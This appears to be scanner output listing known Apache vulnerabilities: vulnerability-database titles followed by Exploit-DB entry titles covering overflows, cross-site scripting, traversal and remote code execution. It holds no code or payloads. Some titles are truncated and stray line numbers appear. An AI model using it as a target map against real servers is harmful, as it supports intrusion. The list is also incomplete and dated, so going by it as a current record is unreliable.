| [64473] Apache Subversion blame -g denial of service
| [64472] Apache Subversion walk() denial of service
| [64407] Apache Axis2 CVE-2010-0219 code execution
| [63926] Apache Archiva password privilege escalation
| [63785] Apache CouchDB LD_LIBRARY_PATH privilege escalation
| [63493] Apache Archiva credentials cross-site request forgery
| [63477] Apache Tomcat HttpOnly session hijacking
| [63422] Apache Tomcat sessionsList.jsp cross-site scripting
| [63303] Apache mod_fcgid module fcgid_header_bucket_read() buffer overflow
| [62959] Apache Shiro filters security bypass
| [62790] Apache Perl cgi module denial of service
| [62576] Apache Qpid exchange denial of service
| [62575] Apache Qpid AMQP denial of service
| [62354] Apache Qpid SSL denial of service
| [62235] Apache APR-util apr_brigade_split_line() denial of service
| [62181] Apache XML-RPC SAX Parser information disclosure
| [61721] Apache Traffic Server cache poisoning
| [61202] Apache Derby BUILTIN authentication functionality information disclosure
| [61186] Apache CouchDB Futon cross-site request forgery
| [61169] Apache CXF DTD denial of service
| [61070] Apache Jackrabbit search.jsp SQL injection
| [61006] Apache SLMS Quoting cross-site request forgery
| [60962] Apache Tomcat time cross-site scripting
| [60883] Apache mod_proxy_http information disclosure
| [60671] Apache HTTP Server mod_cache and mod_dav denial of service
| [60264] Apache Tomcat Transfer-Encoding denial of service
| [59746] Apache Axis2 axis2/axis2-admin page session hijacking
| [59588] Apache Axis2/Java XML DTD (Document Type Declaration) data denial of service
| [59413] Apache mod_proxy_http timeout information disclosure
| [59058] Apache MyFaces unencrypted view state cross-site scripting
| [58827] Apache Axis2 xsd file include
| [58790] Apache Axis2 modules cross-site scripting
| [58299] Apache ActiveMQ queueBrowse cross-site scripting
| [58169] Apache Tomcat Web Application Manager / Host Manager cross-site request forgery
| [58056] Apache ActiveMQ .jsp source code disclosure
| [58055] Apache Tomcat realm name information disclosure
| [58046] Apache HTTP Server mod_auth_shadow security bypass
| [57841] Apache Open For Business Project (OFBiz) subject cross-site scripting
| [57840] Apache Open For Business Project (OFBiz) multiple parameters cross-site scripting
| [57429] Apache CouchDB algorithms information disclosure
| [57398] Apache ActiveMQ Web console cross-site request forgery
| [57397] Apache ActiveMQ createDestination.action cross-site scripting
| [56653] Apache HTTP Server DNS spoofing
| [56652] Apache HTTP Server DNS cross-site scripting
| [56625] Apache HTTP Server request header information disclosure
| [56624] Apache HTTP Server mod_isapi orphaned callback pointer code execution
| [56623] Apache HTTP Server mod_proxy_ajp denial of service
| [55941] mod_proxy module for Apache ap_proxy_send_fb() buffer overflow
| [55857] Apache Tomcat WAR files directory traversal
| [55856] Apache Tomcat autoDeploy attribute security bypass
| [55855] Apache Tomcat WAR directory traversal
| [55210] Intuit component for Joomla! Apache information disclosure
| [54533] Apache Tomcat 404 error page cross-site scripting
| [54182] Apache Tomcat admin default password
| [53878] Apache Solr Search (solr) extension for TYPO3 unspecified cross-site scripting
| [53666] Apache HTTP Server Solaris pollset support denial of service
| [53650] Apache HTTP Server HTTP basic-auth module security bypass
| [53124] mod_proxy_ftp module for Apache HTTP header security bypass
| [53041] mod_proxy_ftp module for Apache denial of service
| [52540] Apache Portable Runtime and Apache Portable Utility library multiple buffer overflow
| [51953] Apache Tomcat Path Disclosure
| [51952] Apache Tomcat Path Traversal
| [51951] Apache stronghold-status Information Disclosure
| [51950] Apache stronghold-info Information Disclosure
| [51949] Apache PHP Source Code Disclosure
| [51948] Apache Multiviews Attack
| [51946] Apache JServ Environment Status Information Disclosure
| [51945] Apache error_log Information Disclosure
| [51944] Apache Default Installation Page Pattern Found
| [51943] Apache AXIS XML Parser echoheaders.jws Sample Web Service Denial of Service
| [51942] Apache AXIS XML External Entity File Retrieval
| [51941] Apache AXIS Sample Servlet Information Leak
| [51940] Apache access_log Information Disclosure
| [51626] Apache mod_deflate denial of service
| [51532] mod_proxy module for the Apache HTTP Server stream_reqbody_cl denial of service
| [51365] Apache Tomcat RequestDispatcher security bypass
| [51273] Apache HTTP Server Incomplete Request denial of service
| [51195] Apache Tomcat XML information disclosure
| [50994] Apache APR-util xml/apr_xml.c denial of service
| [50993] Apache APR-util apr_brigade_vprintf denial of service
| [50964] Apache APR-util apr_strmatch_precompile() denial of service
| [50930] Apache Tomcat j_security_check information disclosure
| [50928] Apache Tomcat AJP denial of service
| [50884] Apache HTTP Server XML ENTITY denial of service
| [50808] Apache HTTP Server AllowOverride privilege escalation
| [50108] Apache Struts s:a tag and s:url tag cross-site scripting
| [50059] Apache mod_proxy_ajp information disclosure
| [49951] Apache Tiles Expression Language (EL) expressions cross-site scripting
| [49925] Apache Geronimo Web Administrative Console cross-site request forgery
| [49924] Apache Geronimo console/portal/Server/Monitoring cross-site scripting
| [49921] Apache ActiveMQ Web interface cross-site scripting
| [49898] Apache Geronimo Services/Repository directory traversal
| [49725] Apache Tomcat mod_jk module information disclosure
| [49715] Apache mod_perl Apache::Status and Apache2::Status modules cross-site scripting
| [49712] Apache Struts unspecified cross-site scripting
| [49213] Apache Tomcat cal2.jsp cross-site scripting
| [48934] Apache Tomcat POST doRead method information disclosure
| [48211] Apache Tomcat header HTTP request smuggling
| [48163] libapache2-mod-auth-mysql module for Debian multibyte encoding SQL injection
| [48110] Apache Jackrabbit search.jsp and swr.jsp cross-site scripting
| [47709] Apache Roller "
| [47104] Novell Netware ApacheAdmin console security bypass
| [47086] Apache HTTP Server OS fingerprinting unspecified
| [46329] Apache Struts FilterDispatcher and DefaultStaticContentLoader class directory traversal
| [45791] Apache Tomcat RemoteFilterValve security bypass
| [44435] Oracle WebLogic Apache Connector buffer overflow
| [44411] Apache Tomcat allowLinking UTF-8 directory traversal
| [44223] Apache HTTP Server mod_proxy_ftp cross-site scripting
| [44156] Apache Tomcat RequestDispatcher directory traversal
| [44155] Apache Tomcat HttpServletResponse.sendError() cross-site scripting
| [43885] Oracle WebLogic Server Apache Connector buffer overflow
| [42987] Apache HTTP Server mod_proxy module denial of service
| [42915] Apache Tomcat JSP files path disclosure
| [42914] Apache Tomcat MS-DOS path disclosure
| [42892] Apache Tomcat unspecified unauthorized access
| [42816] Apache Tomcat Host Manager cross-site scripting
| [42303] Apache 403 error cross-site scripting
| [41618] Apache-SSL ExpandCert() authentication bypass
| [40761] Apache Derby RDBNAM parameter and DatabaseMetaData.getURL information disclosure
| [40736] Apache Tomcat HTTP/1.1 connector information disclosure
| [40614] Apache mod_jk2 HTTP Host header buffer overflow
| [40562] Apache Geronimo init information disclosure
| [40478] Novell Web Manager webadmin-apache.conf security bypass
| [40411] Apache Tomcat exception handling information disclosure
| [40409] Apache Tomcat native (APR based) connector weak security
| [40403] Apache Tomcat quotes and %5C cookie information disclosure
| [40388] Sun Java Plug-In org.apache.crimson.tree.XmlDocument security bypass
| [39893] Apache HTTP Server mod_negotiation HTTP response splitting
| [39867] Apache HTTP Server mod_negotiation cross-site scripting
| [39804] Apache Tomcat SingleSignOn information disclosure
| [39615] Apache HTTP Server mod_proxy_ftp.c UTF-7 cross-site scripting
| [39612] Apache HTTP Server mod_proxy_balancer buffer overflow
| [39608] Apache HTTP Server balancer manager cross-site request forgery
| [39476] Apache mod_proxy_balancer balancer_handler function denial of service
| [39474] Apache HTTP Server mod_proxy_balancer cross-site scripting
| [39472] Apache HTTP Server mod_status cross-site scripting
| [39201] Apache Tomcat JULI logging weak security
| [39158] Apache HTTP Server Windows SMB shares information disclosure
| [39001] Apache HTTP Server mod_imap and mod_imagemap module cross-site scripting
| [38951] Apache::AuthCAS Perl module cookie SQL injection
| [38800] Apache HTTP Server 413 error page cross-site scripting
| [38211] Apache Geronimo SQLLoginModule authentication bypass
| [37243] Apache Tomcat WebDAV directory traversal
| [37178] RHSA update for Apache HTTP Server mod_status module cross-site scripting not installed
| [37177] RHSA update for Apache HTTP Server Apache child process denial of service not installed
| [37119] RHSA update for Apache mod_auth_kerb off-by-one buffer overflow not installed
| [37100] RHSA update for Apache and IBM HTTP Server Expect header cross-site scripting not installed
| [36782] Apache Geronimo MEJB unauthorized access
| [36586] Apache HTTP Server UTF-7 cross-site scripting
| [36468] Apache Geronimo LoginModule security bypass
| [36467] Apache Tomcat functions.jsp cross-site scripting
| [36402] Apache Tomcat calendar cross-site request forgery
| [36354] Apache HTTP Server mod_proxy module denial of service
| [36352] Apache HTTP Server ap_proxy_date_canon() denial of service
| [36336] Apache Derby lock table privilege escalation
| [36335] Apache Derby schema privilege escalation
| [36006] Apache Tomcat "
| [36001] Apache Tomcat Host Manager Servlet alias cross-site scripting
| [35999] Apache Tomcat \"
| [35795] Apache Tomcat CookieExample cross-site scripting
| [35536] Apache Tomcat SendMailServlet example cross-site scripting
| [35384] Apache HTTP Server mod_cache module denial of service
| [35097] Apache HTTP Server mod_status module cross-site scripting
| [35095] Apache HTTP Server Prefork MPM module denial of service
| [34984] Apache HTTP Server recall_headers information disclosure
| [34966] Apache HTTP Server MPM content spoofing
| [34965] Apache HTTP Server MPM information disclosure
| [34963] Apache HTTP Server MPM multiple denial of service
| [34872] Apache MyFaces Tomahawk autoscroll parameter cross-site scripting
| [34869] Apache Tomcat JSP example Web application cross-site scripting
| [34868] Apache Tomcat Manager and Host Manager cross-site scripting
| [34496] Apache Tomcat JK Connector security bypass
| [34377] Apache Tomcat hello.jsp cross-site scripting
| [34212] Apache Tomcat SSL configuration security bypass
| [34210] Apache Tomcat Accept-Language cross-site scripting
| [34209] Apache Tomcat calendar application cross-site scripting
| [34207] Apache Tomcat implicit-objects.jsp cross-site scripting
| [34167] Apache Axis WSDL file path disclosure
| [34068] Apache Tomcat AJP connector information disclosure
| [33584] Apache HTTP Server suEXEC privilege escalation
| [32988] Apache Tomcat proxy module directory traversal
| [32794] Apache Tomcat JK Web Server Connector map_uri_to_worker() buffer overflow
| [32708] Debian Apache tty privilege escalation
| [32441] ApacheStats extract() PHP call unspecified
| [32128] Apache Tomcat default account
| [31680] Apache Tomcat RequestParamExample cross-site scripting
| [31649] Apache Tomcat Sample Servlet TroubleShooter detected
| [31557] BEA WebLogic Server and WebLogic Express Apache proxy plug-in denial of service
| [31236] Apache HTTP Server htpasswd.c strcpy buffer overflow
| [30456] Apache mod_auth_kerb off-by-one buffer overflow
| [29550] Apache mod_tcl set_var() format string
| [28620] Apache and IBM HTTP Server Expect header cross-site scripting
| [28357] Apache HTTP Server mod_alias script source information disclosure
| [28063] Apache mod_rewrite off-by-one buffer overflow
| [27902] Apache Tomcat URL information disclosure
| [26786] Apache James SMTP server denial of service
| [25680] libapache2 /tmp/svn file upload
| [25614] Apache Struts lookupMap cross-site scripting
| [25613] Apache Struts ActionForm denial of service
| [25612] Apache Struts isCancelled() security bypass
| [24965] Apache mod_python FileSession command execution
| [24716] Apache James spooler memory leak denial of service
| [24159] Apache Geronimo Web-Access-Log Viewer cross-site scripting
| [24158] Apache Geronimo jsp-examples cross-site scripting
| [24030] Apache auth_ldap module multiple format strings
| [24008] Apache mod_ssl custom error message denial of service
| [24003] Apache mod_auth_pgsql module multiple syslog format strings
| [23612] Apache mod_imap referer field cross-site scripting
| [23173] Apache Struts error message cross-site scripting
| [22942] Apache Tomcat directory listing denial of service
| [22858] Apache Multi-Processing Module code allows denial of service
| [22602] RHSA-2005:582 updates for Apache httpd not installed
| [22520] Apache mod-auth-shadow "
| [22466] ApacheTop symlink
| [22109] Apache HTTP Server ssl_engine_kernel client certificate validation
| [22006] Apache HTTP Server byte-range filter denial of service
| [21567] Apache mod_ssl off-by-one buffer overflow
| [21195] Apache HTTP Server header HTTP request smuggling
| [20383] Apache HTTP Server htdigest buffer overflow
| [19681] Apache Tomcat AJP12 request denial of service
| [18993] Apache HTTP server check_forensic symlink attack
| [18790] Apache Tomcat Manager cross-site scripting
| [18349] Apache HTTP server Apple HFS+ filesystem obtain information
| [18348] Apache HTTP server Apple HFS+ filesystem .DS_Store and .ht file disclosure
| [18347] Apache HTTP server Apple Mac OS X Server mod_digest_apple module could allow an attacker to replay responses
| [17961] Apache Web server ServerTokens has not been set
| [17930] Apache HTTP Server HTTP GET request denial of service
| [17785] Apache mod_include module buffer overflow
| [17671] Apache HTTP Server SSLCipherSuite bypass restrictions
| [17473] Apache HTTP Server Satisfy directive allows access to resources
| [17413] Apache htpasswd buffer overflow
| [17384] Apache HTTP Server environment variable configuration file buffer overflow
| [17382] Apache HTTP Server IPv6 apr_util denial of service
| [17366] Apache HTTP Server mod_dav module LOCK denial of service
| [17273] Apache HTTP Server speculative mode denial of service
| [17200] Apache HTTP Server mod_ssl denial of service
| [16890] Apache HTTP Server server-info request has been detected
| [16889] Apache HTTP Server server-status request has been detected
| [16705] Apache mod_ssl format string attack
| [16524] Apache HTTP Server ap_get_mime_headers_core denial of service
| [16387] Apache HTTP Server mod_proxy Content-Length buffer overflow
| [16230] Apache HTTP Server PHP denial of service
| [16214] Apache mod_ssl ssl_util_uuencode_binary buffer overflow
| [15958] Apache HTTP Server authentication modules memory corruption
| [15547] Apache HTTP Server mod_disk_cache local information disclosure
| [15540] Apache HTTP Server socket starvation denial of service
| [15467] Novell GroupWise WebAccess using Apache Web server allows viewing of files on the server
| [15422] Apache HTTP Server mod_access information disclosure
| [15419] Apache HTTP Server mod_ssl plain HTTP request denial of service
| [15293] Apache for Cygwin "
| [15065] Apache-SSL has a default password
| [15041] Apache HTTP Server mod_digest module could allow an attacker to replay responses
| [15015] Apache httpd server httpd.conf could allow a local user to bypass restrictions
| [14751] Apache Mod_python output filter information disclosure
| [14125] Apache HTTP Server mod_userdir module information disclosure
| [14075] Apache HTTP Server mod_php file descriptor leak
| [13703] Apache HTTP Server account
| [13689] Apache HTTP Server configuration allows symlinks
| [13688] Apache HTTP Server configuration allows SSI
| [13687] Apache HTTP Server Server: header value
| [13685] Apache HTTP Server ServerTokens value
| [13684] Apache HTTP Server ServerSignature value
| [13672] Apache HTTP Server config allows directory autoindexing
| [13671] Apache HTTP Server default content
| [13670] Apache HTTP Server config file directive references outside content root
| [13668] Apache HTTP Server httpd not running in chroot environment
| [13666] Apache HTTP Server CGI directory contains possible command interpreter or compiler
| [13664] Apache HTTP Server config file contains ScriptAlias entry
| [13663] Apache HTTP Server CGI support modules loaded
| [13661] Apache HTTP Server config file contains AddHandler entry
| [13660] Apache HTTP Server 500 error page not CGI script
| [13659] Apache HTTP Server 413 error page not CGI script
| [13658] Apache HTTP Server 403 error page not CGI script
| [13657] Apache HTTP Server 401 error page not CGI script
| [13552] Apache HTTP Server mod_cgid module information disclosure
| [13550] Apache GET request directory traversal
| [13516] Apache Cocoon XMLForm and JXForm could allow execution of code
| [13499] Apache Cocoon directory traversal allows downloading of boot.ini file
| [13429] Apache Tomcat non-HTTP request denial of service
| [13400] Apache HTTP server mod_alias and mod_rewrite buffer overflow
| [13295] Apache weak password encryption
| [13254] Apache Tomcat .jsp cross-site scripting
| [13125] Apache::Gallery Inline::C could allow arbitrary code execution
| [13086] Apache Jakarta Tomcat mod_jk format string allows remote access
| [12681] Apache HTTP Server mod_proxy could allow mail relaying
| [12662] Apache HTTP Server rotatelogs denial of service
| [12554] Apache Tomcat stores password in plain text
| [12553] Apache HTTP Server redirects and subrequests denial of service
| [12552] Apache HTTP Server FTP proxy server denial of service
| [12551] Apache HTTP Server prefork MPM denial of service
| [12550] Apache HTTP Server weaker than expected encryption
| [12549] Apache HTTP Server type-map file denial of service
| [12206] Apache Tomcat /opt/tomcat directory insecure permissions
| [12102] Apache Jakarta Tomcat MS-DOS device name request denial of service
| [12091] Apache HTTP Server apr_password_validate denial of service
| [12090] Apache HTTP Server apr_psprintf code execution
| [11804] Apache HTTP Server mod_access_referer denial of service
| [11750] Apache HTTP Server could leak sensitive file descriptors
| [11730] Apache HTTP Server error log and access log terminal escape sequence injection
| [11703] Apache long slash path allows directory listing
| [11695] Apache HTTP Server LF (Line Feed) denial of service
| [11694] Apache HTTP Server filestat.c denial of service
| [11438] Apache HTTP Server MIME message boundaries information disclosure
| [11412] Apache HTTP Server error log terminal escape sequence injection
| [11196] Apache Tomcat examples and ROOT Web applications cross-site scripting
| [11195] Apache Tomcat web.xml could be used to read files
| [11194] Apache Tomcat URL appended with a null character could list directories
| [11139] Apache HTTP Server mass virtual hosting with mod_rewrite or mod_vhost_alias could allow an attacker to obtain files
| [11126] Apache HTTP Server illegal character file disclosure
| [11125] Apache HTTP Server DOS device name HTTP POST code execution
| [11124] Apache HTTP Server DOS device name denial of service
| [11088] Apache HTTP Server mod_vhost_alias CGI source disclosure
| [10938] Apache HTTP Server printenv test CGI cross-site scripting
| [10771] Apache Tomcat mod_jk module multiple HTTP GET request buffer overflow
| [10575] Apache mod_php module could allow an attacker to take over the httpd process
| [10499] Apache HTTP Server WebDAV HTTP POST view source
| [10457] Apache HTTP Server mod_ssl "
| [10415] Apache HTTP Server htdigest insecure system() call could allow command execution
| [10414] Apache HTTP Server htdigest multiple buffer overflows
| [10413] Apache HTTP Server htdigest temporary file race condition
| [10412] Apache HTTP Server htpasswd temporary file race condition
| [10376] Apache Tomcat invoker servlet used in conjunction with the default servlet reveals source code
| [10348] Apache Tomcat HTTP GET request DOS device reference could cause a denial of service
| [10281] Apache HTTP Server ab.c ApacheBench long response buffer overflow
| [10280] Apache HTTP Server shared memory scorecard overwrite
| [10263] Apache Tomcat mod_jk or mod_jserv connector directory disclosure
| [10241] Apache HTTP Server Host: header cross-site scripting
| [10230] Slapper worm variants A, B, and C target OpenSSL/Apache systems
| [10208] Apache HTTP Server mod_dav denial of service
| [10206] HP VVOS Apache mod_ssl denial of service
| [10200] Apache HTTP Server stderr denial of service
| [10175] Apache Tomcat org.apache.catalina.servlets.DefaultServlet reveals source code
| [10169] Slapper worm variant (Slapper.C) targets OpenSSL/Apache systems
| [10154] Slapper worm variant (Slapper.B) targets OpenSSL/Apache systems
| [10098] Slapper worm targets OpenSSL/Apache systems
| [9876] Apache HTTP Server cgi/cgid request could disclose the path to a requested script
| [9875] Apache HTTP Server .var file request could disclose installation path
| [9863] Apache Tomcat web.xml file could allow a remote attacker to bypass restrictions
| [9808] Apache HTTP Server non-Unix version URL encoded directory traversal
| [9623] Apache HTTP Server ap_log_rerror() path disclosure
| [9520] Apache Tomcat /servlet/ mapping cross-site scripting
| [9415] Apache HTTP Server mod_ssl .htaccess off-by-one buffer overflow
| [9396] Apache Tomcat null character to threads denial of service
| [9394] Apache Tomcat HTTP request for LPT9 reveals Web root path
| [9249] Apache HTTP Server chunked encoding heap buffer overflow
| [9208] Apache Tomcat sample file requests could reveal directory listing and path to Web root directory
| [8932] Apache Tomcat example class information disclosure
| [8633] Apache HTTP Server with mod_rewrite could allow an attacker to bypass directives
| [8629] Apache HTTP Server double-reverse DNS lookup spoofing
| [8589] Apache HTTP Server for Windows DOS batch file remote command execution
| [8457] Oracle9i Application Server Apache PL/SQL HTTP Location header buffer overflow
| [8455] Oracle9i Application Server default installation could allow an attacker to access certain Apache Services
| [8400] Apache HTTP Server mod_frontpage buffer overflows
| [8326] Apache HTTP Server multiple MIME headers (sioux) denial of service
| [8308] Apache "
| [8275] Apache HTTP Server with Multiviews enabled could disclose directory contents
| [8119] Apache and PHP OPTIONS request reveals "
| [8054] Apache is running on the system
| [8029] Mandrake Linux default Apache configuration could allow an attacker to browse files and directories
| [8027] Mandrake Linux default Apache configuration has remote management interface enabled
| [8026] Mandrake Linux Apache sample programs could disclose sensitive information about the server
| [7836] Apache HTTP Server log directory denial of service
| [7815] Apache for Windows "
| [7810] Apache HTTP request could result in unexpected behavior
| [7599] Apache Tomcat reveals installation path
| [7494] Apache "
| [7419] Apache Web Server could allow remote attackers to overwrite .log files
| [7363] Apache Web Server hidden HTTP requests
| [7249] Apache mod_proxy denial of service
| [7129] Linux with Apache Web server could allow an attacker to determine if a specified username exists
| [7103] Apple Mac OS X used with Apache Web server could disclose directory contents
| [7059] Apache "
| [7057] Apache "
| [7056] Apache "
| [7055] Apache "
| [7054] Apache "
| [6997] Apache Jakarta Tomcat error message may reveal information
| [6971] Apache Jakarta Tomcat may reveal JSP source code with missing HTTP protocol specification
| [6970] Apache crafted HTTP request could reveal the internal IP address
| [6921] Apache long slash path allows directory listing
| [6687] Apple Mac OS X used with Apache Web server could allow arbitrary file disclosure
| [6527] Apache Web Server for Windows and OS2 denial of service
| [6316] Apache Jakarta Tomcat may reveal JSP source code
| [6305] Apache Jakarta Tomcat directory traversal
| [5926] Linux Apache symbolic link
| [5659] Apache Web server discloses files when used with php script
| [5310] Apache mod_rewrite allows attacker to view arbitrary files
| [5204] Apache WebDAV directory listings
| [5197] Apache Web server reveals CGI script source code
| [5160] Apache Jakarta Tomcat default installation
| [5099] Trustix Secure Linux installs Apache with world writable access
| [4968] Apache Jakarta Tomcat snoop servlet gives out information which could be used in attack
| [4967] Apache Jakarta Tomcat 404 error reveals the pathname of the requested file
| [4931] Apache source.asp example file allows users to write to files
| [4575] IBM HTTP Server running Apache allows users to directory listing and file retrieval
| [4205] Apache Jakarta Tomcat delivers file contents
| [2084] Apache on Debian by default serves the /usr/doc directory
| [1630] MessageMedia UnityMail and Apache Web server MIME header flood denial of service
| [697] Apache HTTP server beck exploit
| [331] Apache cookies buffer overflow
|
| Exploit-DB - https://www.exploit-db.com:
| [31130] Apache Tomcat <= 6.0.15 Cookie Quote Handling Remote Information Disclosure Vulnerability
| [31052] Apache <= 2.2.6 'mod_negotiation' HTML Injection and HTTP Response Splitting Vulnerability
| [30901] Apache HTTP Server 2.2.6 Windows Share PHP File Extension Mapping Information Disclosure Vulnerability
| [30835] Apache HTTP Server <= 2.2.4 413 Error HTTP Request Method Cross-Site Scripting Weakness
| [30563] Apache Tomcat <= 5.5.15 Cal2.JSP Cross-Site Scripting Vulnerability
| [30496] Apache Tomcat <= 6.0.13 Cookie Handling Quote Delimiter Session ID Disclosure
| [30495] Apache Tomcat <= 6.0.13 Host Manager Servlet Cross Site Scripting Vulnerability
| [30191] Apache MyFaces Tomahawk JSF Framework 1.1.5 Autoscroll Parameter Cross Site Scripting Vulnerability
| [30189] Apache Tomcat <= 6.0.13 JSP Example Web Applications Cross Site Scripting Vulnerability
| [30052] Apache Tomcat 6.0.10 Documentation Sample Application Multiple Cross-Site Scripting Vulnerabilities
| [29930] Apache AXIS 1.0 Non-Existent WSDL Path Information Disclosure Vulnerability
| [29859] Apache Roller OGNL Injection
| [29739] Apache HTTP Server Tomcat 5.x/6.0.x Directory Traversal Vulnerability
| [29435] Apache Tomcat 5.5.25 - CSRF Vulnerabilities
| [29316] Apache + PHP 5.x - Remote Code Execution (Multithreaded Scanner) (2)
| [29290] Apache / PHP 5.x Remote Code Execution Exploit
| [28713] Apache Tomcat/JBoss EJBInvokerServlet / JMXInvokerServlet (RMI over HTTP) Marshalled Object RCE
| [28424] Apache 2.x HTTP Server Arbitrary HTTP Request Headers Security Weakness
| [28365] Apache 2.2.2 CGI Script Source Code Information Disclosure Vulnerability
| [28254] Apache Tomcat 5 Information Disclosure Vulnerability
| [27915] Apache James 2.2 SMTP Denial of Service Vulnerability
| [27397] Apache suEXEC Privilege Elevation / Information Disclosure
| [27135] Apache Struts 2 DefaultActionMapper Prefixes OGNL Code Execution
| [27096] Apache Geronimo 1.0 Error Page XSS
| [27095] Apache Tomcat / Geronimo 1.0 Sample Script cal2.jsp time Parameter XSS
| [26710] Apache CXF prior to 2.5.10, 2.6.7 and 2.7.4 - Denial of Service
| [26542] Apache Struts 1.2.7 Error Response Cross-Site Scripting Vulnerability
| [25986] Plesk Apache Zeroday Remote Exploit
| [25980] Apache Struts includeParams Remote Code Execution
| [25625] Apache 1.3.x HTDigest Realm Command Line Argument Buffer Overflow Vulnerability (2)
| [25624] Apache 1.3.x HTDigest Realm Command Line Argument Buffer Overflow Vulnerability (1)
| [24874] Apache Struts ParametersInterceptor Remote Code Execution
| [24744] Apache Rave 0.11 - 0.20 - User Information Disclosure
| [24694] Apache 1.3.x mod_include Local Buffer Overflow Vulnerability
| [24590] Apache 2.0.x mod_ssl Remote Denial of Service Vulnerability
| [23751] Apache Cygwin 1.3.x/2.0.x Directory Traversal Vulnerability
| [23581] Apache 2.0.4x mod_perl Module File Descriptor Leakage Vulnerability
| [23482] Apache 2.0.4x mod_php Module File Descriptor Leakage Vulnerability (2)
| [23481] Apache 2.0.4x mod_php Module File Descriptor Leakage Vulnerability (1)
| [23296] Red Hat Apache 2.0.40 Directory Index Default Configuration Error
| [23282] apache cocoon 2.14/2.2 - Directory Traversal vulnerability
| [23245] Apache Tomcat 4.0.x Non-HTTP Request Denial of Service Vulnerability
| [23119] Apache::Gallery 0.4/0.5/0.6 Insecure Local File Storage Privilege Escalation Vulnerability
| [22505] Apache Mod_Access_Referer 1.0.2 NULL Pointer Dereference Denial of Service Vulnerability
| [22205] Apache Tomcat 3.x Null Byte Directory/File Disclosure Vulnerability
| [22191] Apache Web Server 2.0.x MS-DOS Device Name Denial of Service Vulnerability
| [22068] Apache 1.3.x,Tomcat 4.0.x/4.1.x Mod_JK Chunked Encoding Denial of Service Vulnerability
| [21885] Apache 1.3/2.0.x Server Side Include Cross Site Scripting Vulnerability
| [21882] Apache Tomcat 3.2 Directory Disclosure Vulnerability
| [21854] Apache 2.0.39/40 Oversized STDERR Buffer Denial of Service Vulnerability
| [21853] Apache Tomcat 3/4 DefaultServlet File Disclosure Vulnerability
| [21734] Apache Tomcat 4.1 JSP Request Cross Site Scripting Vulnerability
| [21719] Apache 2.0 Path Disclosure Vulnerability
| [21697] Apache 2.0 Encoded Backslash Directory Traversal Vulnerability
| [21605] Apache Tomcat 4.0.3 DoS Device Name Cross Site Scripting Vulnerability
| [21604] Apache Tomcat 4.0.3 Servlet Mapping Cross Site Scripting Vulnerability
| [21560] Apache 1.x/2.0.x Chunked-Encoding Memory Corruption Vulnerability (2)
| [21559] Apache 1.x/2.0.x Chunked-Encoding Memory Corruption Vulnerability (1)
| [21534] Apache Tomcat 3/4 JSP Engine Denial of Service Vulnerability
| [21492] Apache Tomcat 3.2.3/3.2.4 RealPath.JSP Malformed Request Information Disclosure
| [21491] Apache Tomcat 3.2.3/3.2.4 Example Files Web Root Path Disclosure
6977| [21490] Apache Tomcat 3.2.3/3.2.4 Source.JSP Malformed Request Information Disclosure
6978| [21412] Apache Tomcat 4.0/4.1 Servlet Path Disclosure Vulnerability
6979| [21350] Apache Win32 1.3.x/2.0.x Batch File Remote Command Execution Vulnerability
6980| [21204] Apache 1.3.20 Win32 PHP.EXE Remote File Disclosure Vulnerability
6981| [21112] Red Hat Linux 7.0 Apache Remote Username Enumeration Vulnerability
6982| [21067] Apache 1.0/1.2/1.3 Server Address Disclosure Vulnerability
6983| [21002] Apache 1.3 Possible Directory Index Disclosure Vulnerability
6984| [20911] Apache 1.3.14 Mac File Protection Bypass Vulnerability
6985| [20716] apache tomcat 3.0 - Directory Traversal vulnerability
6986| [20695] Apache 1.3 Artificially Long Slash Path Directory Listing Vulnerability (4)
6987| [20694] Apache 1.3 Artificially Long Slash Path Directory Listing Vulnerability (3)
6988| [20693] Apache 1.3 Artificially Long Slash Path Directory Listing Vulnerability (2)
6989| [20692] Apache 1.3 Artificially Long Slash Path Directory Listing Vulnerability (1)
6990| [20595] NCSA 1.3/1.4.x/1.5,Apache httpd 0.8.11/0.8.14 ScriptAlias Source Retrieval Vulnerability
6991| [20558] Apache 1.2 Web Server DoS Vulnerability
6992| [20466] Apache 1.3 Web Server with Php 3 File Disclosure Vulnerability
6993| [20435] Apache 0.8.x/1.0.x,NCSA httpd 1.x test-cgi Directory Listing Vulnerability
6994| [20272] Apache 1.2.5/1.3.1,UnityMail 2.0 MIME Header DoS Vulnerability
6995| [20210] Apache 1.3.12 WebDAV Directory Listings Vulnerability
6996| [20131] Apache Tomcat 3.1 Path Revealing Vulnerability
6997| [19975] Apache 1.3.6/1.3.9/1.3.11/1.3.12/1.3.20 Root Directory Access Vulnerability
6998| [19828] Cobalt RaQ 2.0/3.0 Apache .htaccess Disclosure Vulnerability
6999| [19536] Apache <= 1.1,NCSA httpd <= 1.5.2,Netscape Server 1.12/1.1/2.0 a nph-test-cgi Vulnerability
7000| [19231] PHP apache_request_headers Function Buffer Overflow
7001| [18984] Apache Struts <= 2.2.1.1 - Remote Command Execution
7002| [18897] Oracle Weblogic Apache Connector POST Request Buffer Overflow
7003| [18619] Apache Tomcat Remote Exploit (PUT Request) and Account Scanner
7004| [18452] Apache Struts Multiple Persistent Cross-Site Scripting Vulnerabilities
7005| [18442] Apache httpOnly Cookie Disclosure
7006| [18329] Apache Struts2 <= 2.3.1 - Multiple Vulnerabilities
7007| [18221] Apache HTTP Server Denial of Service
7008| [17969] Apache mod_proxy Reverse Proxy Exposure Vulnerability PoC
7009| [17696] Apache httpd Remote Denial of Service (memory exhaustion)
7010| [17691] Apache Struts < 2.2.0 - Remote Command Execution
7011| [16798] Apache mod_jk 1.2.20 Buffer Overflow
7012| [16782] Apache Win32 Chunked Encoding
7013| [16752] Apache module mod_rewrite LDAP protocol Buffer Overflow
7014| [16317] Apache Tomcat Manager Application Deployer Authenticated Code Execution
7015| [15710] Apache Archiva 1.0 - 1.3.1 CSRF Vulnerability
7016| [15319] Apache 2.2 (Windows) Local Denial of Service
7017| [14617] Apache JackRabbit 2.0.0 webapp XPath Injection
7018| [14489] Apache Tomcat < 6.0.18 utf8 - Directory Traversal vulnerability
7019| [12721] Apache Axis2 1.4.1 - Local File Inclusion Vulnerability
7020| [12689] Authenticated Cross-Site Scripting Vulnerability (XSS) within Apache Axis2 administration console
7021| [12343] Apache Tomcat 5.5.0 to 5.5.29 & 6.0.0 to 6.0.26 - Information Disclosure Vulnerability
7022| [12330] Apache OFBiz - Multiple XSS
7023| [12264] Apache OFBiz - FULLADMIN Creator PoC Payload
7024| [12263] Apache OFBiz - SQL Remote Execution PoC Payload
7025| [11662] Apache Spamassassin Milter Plugin Remote Root Command Execution
